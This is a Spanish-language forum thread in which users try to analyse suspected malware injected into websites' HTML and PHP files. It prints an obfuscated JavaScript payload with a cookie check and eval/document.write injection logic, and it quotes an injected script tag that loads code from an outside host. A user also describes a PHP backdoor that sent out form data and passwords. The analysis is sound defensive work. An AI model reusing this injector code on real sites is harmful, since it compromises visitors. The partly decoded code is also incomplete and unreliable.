virus en archivo html? / y algunos php

[Shell Root]

Ok, ya lo estoy analizando, esta un poco entretenido. XD Dejadme analizarlo más y te dejo el resultado, por ahora veo como una redirección a una URL que aún no he podido descubrir cual es.

Tengo decodificado esto,

Código (javascript) [Seleccionar] Expandir

de = "!%209M0;0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0$90;0~e}9050!%209M+0}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8ts%7F}79+m";
dd = "08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9;!%20%20+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050";
ca = "%66un%63tio%6e %64cs%28ds%2ces%29%7bd%73%3dunes%63ape%";
cz = "%66u%6ect%69on%20cz%28cz%29%7bretur%6e ca%2bc%62%2bcc%2b%63d+c%65%2bcz%3b};";
cb = "28ds%29;s%74%3dtmp%3d%27%27;for(i%3d0;i%3cd%73%2el%65n";
dz = "%66un%63ti%6fn%20dw%28t%29%7bca%3d%27%2564oc%2575m%65%256et%2ew%2572%2569te%2528%2522%27;ce%3d%27%2522)%27;cb%3d%27%253c%2573cri%2570t l%2561n%2567%75a%67%25%365%253d%255%63%2522ja%76as%63%2572i%70%2574%255%63%2522%253e%27;c%63%3d%27%253c%255c%252fs%63ri%70t%253e%27;wi%6ed%6fw[%22e%22+%22%22+ %22v%22+%22al%22](unes%63ape%28t)%29}%3b";
da = "fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%";
cc = "%67%74h;%69++%29%7bt%6dp%3dds.s%6cic%65(i%2ci+1%29;%73";
ce = "cha%72Co%64eAt%280)%5e%28%270x0%30%27+%65s)%29);}%7d";
op = "%24a%3d%22dw(dcs(%63%75,1%34%29)%3b%22;";
st = "%73t%3d%22$%61%3d%73t%3bd%63s%28%64%61%2b%64%62+%64%63+%64%64%2b%64%65,%31%30)%3bd%77(%73t%29;%73%74%3d$a%3b%22%3b";
db = "7FtuQd8!90;0!%200;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>sxqbS%7FtuQd8!90;0'0;gy~t%7Fg>dg>dbu~tcKyMK%26M>aeubi>|u~wdx+m0yv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7v";
dc = "rs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87trc7<07id~7<07f}d7<07f}b7<07}|s7<07%7Fh{7<07vtc7<07rfv7<07iec7<07}s`7<07~sj7<07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;";
cu = "(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;y}%7F;64c}p`|)%$$4|q}s|`),$*(;}rfuyq*(;p}b*";
cd = "%74%3dst+%53%74rin%67.fr%6fmC%68a%72C%6fd%65(%28tmp%2e";

if (document.cookie.indexOf('rf5f6ds') == -1) {
 function callback(x) {
   window.tw = x;
   var d = new Date();
   d.setTime(x["as_of"] * 1000);
   var h = d.getUTCHours();
   window.h = h;
   if (h > 8) {
     d.setUTCDate(d.getUTCDate() - 2);
   } else {
     d.setUTCDate(d.getUTCDate() - 3);
   }
   window.gd = d;
   var time = new Array();
   var shiftIndex = "";
   time["year"] = d.getUTCFullYear();
   time["month"] = d.getUTCMonth() + 1;
   time["day"] = d.getUTCDate();
   if (d.getUTCMonth() + 1 < 10) {
     shiftIndex = time["year"] + "-0" + (d.getUTCMonth() + 1);
   } else {
     shiftIndex = time["year"] + "-" + (d.getUTCMonth() + 1);
   }
   if (d.getUTCDate() < 10) {
     shiftIndex = shiftIndex + "-0" + d.getUTCDate();
   } else {
     shiftIndex = shiftIndex + "-" + d.getUTCDate();
   }
   document.write("" + "");
 }
 function callback2(x) {
   window.tw = x;
   sc('rf5f6ds', 2, 7);
   eval(unescape(dz + cz + op + st) + 'dw(dz+cz($a+st));');
   /*
function dw(t) {
  ca = 'document.write("';
  ce = '")';
  cb = '<script language=\"javascript\">';
  cc = '<\/script>';
  window["eval"](unescape(t))
};

function cz(cz) {
  return ca + cb + cc + cd + ce + cz;
};
$a = "dw(dcs(cu,14));";
st = "$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";
dw(dz + cz($a + st));
    */

   document.write($a);
 }
 document.write(" " + "");
} else {
 $a = ''
};

function sc(cnm, v, ed) {
 var exd = new Date();
 exd.setDate(exd.getDate() + ed);
 document.cookie = cnm + '=' + escape(v) + ';expires=' + exd.toGMTString();
};

[Cergath]

Hola Shell, como has estado? disculpame el atrevimiento, pero me gustaria saber si tienes alguna novedad respecto a esto, seria genial

[WHK]

por lo menos no afecta sea lo que sea porque en firefox me da error de sintaxis, está mal codeado o el código está incompleto :-/

Error: syntax error
Archivo de origen: file:///C:/Users/Yan/Desktop/ver.html
Línea: 28
Código fuente:
var $a = BKbk34b32.replace(/98/g, "Z");

asi que no pude hacerle un debugg.

[berz3k]

Yo encontre en mis servers un php tambien bastante extranio despues de decodearlo me encontre que hacia peticiones a otra page "redirect" enviando todos mis formularios y/o contrasenias que alojaba, ademas de buscar servidores "Relaying" para SPAM.

bajare el file y ya os cuento.

-berz3k.

[berz3k]

Pues no pude bajar el file de megaupload, podras treparlo a otro site

-berz3k.

[Shell Root]

El link funciona correctamente 

[berz3k]

@Shell Root Algo pasa con mis Addons de Chrome, lo podras subir a
:http://rghost.net/

-berz3k.

[Shell Root]

:http://rghost.net/3867259

[berz3k]

Lo tengo ya os cuento.

-berz3k.

[Cergath]

Otra vez sucede, ahora con:
<scri pt ty pe="text/jav ascript" src=" http://merchant.aegispayments.com/in.cgi?default" ></sc ript>